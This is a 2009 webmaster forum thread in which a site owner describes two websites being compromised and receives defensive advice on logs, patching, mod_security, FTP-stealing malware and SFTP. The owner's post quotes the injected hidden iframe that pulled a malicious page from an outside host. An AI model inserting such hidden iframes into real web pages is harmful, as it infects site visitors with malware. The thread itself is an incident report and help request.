homepage Welcome to WebmasterWorld Guest from 107.20.129.212
register, login, search, subscribe, help, library, PubCon, announcements, recent posts, open posts,
Subscribe to WebmasterWorld

Visit PubCon.com
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library : Charter : Moderators: phranque

Website Technology Issues Forum

    
Two of my websites hacked on the same day
dunhill




msg:3950567		 7:45 am on Jul 11, 2009 (gmt 0)

2 of my websites were hacked on the same day, one is hosted by a very large hosting company and the other is my own server.

If it was just my server that got hacked I would have thought that I havent made my server secure enough.

On my own server I have root access, on the other server its just ftp access, passwords are different, one is Plesk the other is CPanel.

Most of the index.php and other php scripts were modified to include the following

<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>

I was first made aware when I got an email from Google advising me of the problem - "We recently discovered that some of your pages can cause users to be infected with malicious software."

The question is how did they hack me, when can I do to prevent it?

Thank you for your help

[edited by: encyclo at 11:40 am (utc) on July 11, 2009]
[edit reason] obfuscated link to hacker website [/edit]

 

janharders




msg:3950580		 8:09 am on Jul 11, 2009 (gmt 0)

Look through the error logs of your apache.
With the shared hosting it might have been a local attack, but on your own server (I guess you did have strong passwords?) that can be doubted. I was once asked to clean an infected site and I searched for the entry point and found the error log extremly helpful identifying the joomla module that was exploited. They need a way to load code from a remote machine and they'll usually try multiple times before it succeeds - and these tries can get logged.

Do you use some public cms on both sides? That's what you should look at first.
What you can do to prevent it: stay up to date with your non-inhouse scripts. Once an exploit is in the open, they'll use google to find exploitable sites and just run their bots to try it. Stay ahead. You might also want to look at mod_security, at least for your dedicated server.

dunhill




msg:3950585		 8:39 am on Jul 11, 2009 (gmt 0)

I don't use any CMS, there is no common software between the 2 sites.

I also have mod_security already running on my server

The passwords are secure, not based on names, it has both alpha and numeric characters

I will have a look at the apache logs.

encyclo




msg:3950621		 11:31 am on Jul 11, 2009 (gmt 0)

There are a few Windows virus variants around (such as "gumblar") which infect your local machine and steal FTP passwords from programs such as Filezilla. You should probably start by scanning your local machine for those viruses. Then you will need to change all your passwords.

Note that FTP is inherently insecure because the password is transmitted in plain-text - using ssh (secure FTP) is a much better option, most FTP clients support secure FTP out of the box, and your servers almost certainly will too.

janharders




msg:3950647		 1:10 pm on Jul 11, 2009 (gmt 0)

using ssh (secure FTP) is a much better option

just to add: ftp over ssl (ftps) is also much more secure than regular ftp and I've found it to be performing better than sftp in my setup.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
WebmasterWorld ® and PubCon ® are a Registered Trademarks of Pubcon Inc.
© Pubcon Inc. 1996-2012 all rights reserved